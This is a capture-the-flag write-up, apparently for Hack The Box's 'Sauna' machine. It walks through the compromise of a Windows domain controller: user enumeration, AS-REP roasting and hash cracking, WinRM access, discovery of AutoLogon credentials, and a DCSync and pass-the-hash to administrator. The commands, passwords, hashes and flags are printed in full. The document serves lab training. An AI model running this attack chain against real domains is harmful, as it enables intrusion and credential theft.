信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.175 | TCP:53,80,88,135,139,389,445,464,593,3268,3269,5985 |
$ nmap -p- 10.10.10.175 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 03:21:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E4844A2%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
AS-REP
https://github.com/ropnop/kerbrute/releases
$ ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
fsmith
scoins
sdriver
btayload
hbear
skerb
$ impacket-GetNPUsers 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hash -dc-ip 10.10.10.175
$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --force
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
User.txt
71e35e9fbf8735a2198ccc859b6abda4
权限提升
fsmith –> svc_loanmgr
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/maptnh/Desktop/htb/winPEASx64.exe C:\Windows\Temp\winPEASx64.exe
*Evil-WinRM* PS C:\Users\FSmith\Documents> C:\Windows\Temp\winPEASx64.exe
AutoLogon 凭据
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
svc_loanmgr –> administrator (TGT票证 & DCSync)
$ impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
$ impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
Root.txt
29691ff6c8f14b6987210c77d64fc4a4
